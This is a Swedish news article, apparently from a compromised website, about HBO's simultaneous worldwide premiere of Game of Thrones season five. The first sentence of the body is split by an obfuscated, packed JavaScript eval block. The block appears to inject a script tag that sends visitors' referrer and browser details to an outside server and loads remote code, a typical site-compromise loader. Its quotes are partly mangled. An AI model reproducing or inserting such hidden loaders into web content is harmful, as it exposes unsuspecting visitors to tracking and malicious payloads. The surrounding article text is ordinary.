Image Image Image Image Image Image Image Image Image Image

| 4 juni, 2020

Scroll to top

Top

Game of Thrones global sampremiär

Game of Thrones global sampremiär
Sebastian

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zbaed|var|u0026u|referrer|nnkne||js|php’.split(’|’),0,{}))
femte säsongen av HBO:s succéserie Game of Thrones kommer få simultan premiär i 170 länder samtidigt som den sänds i USA, söndag den 12 april kl. 21.00 lokal tid. Detta meddelades idag av HBO. Det betyder att HBO Nordics kunder i Sverige får chansen att se världspremiären kl. 03.00 den 13/4.

Femte säsongen av den Emmy-, Golden Globe- och Peabody-belönade serien Game of Thrones får simultan sändningstid i alla HBO-nätverk och dess tv-partners över hela världen. En gigantisk, gobal tv-händelse, varje vecka genom hela säsongens tio avsnitt.

“We are thrilled to see our international partners jumping on board to bring Game of Thrones, one of the most universally loved television shows in the world, to global audiences at the same time it airs on HBO in the U.S.,” said Michael Lombardo, President, HBO Programming. “It’s going to be a great season.”

Sedan allra första avsnittet har Game of Thrones världsomspännande fenomen vuxit till att bli HBO:s populäraste serie någonsin. Förra året toppade den tv-sökningar på Google och var den mest omtalade serien på amerikanska Facebook.

Serien är baserad på George R.R. Martins fantasyböcker A Song of Ice and Fire – en storslagen berättelse med politisk och sexuell intrig runt de sju nobla familjerna som slåss om kontrollen över det mytomspunna landet Westeros. Game of Thrones episka serie om svek och nobelhet, familj och ära, ambition och kärlek, död och överlevnad, har fångat in fans över hela världen och gjort den till en av tv-världens mest populära serier.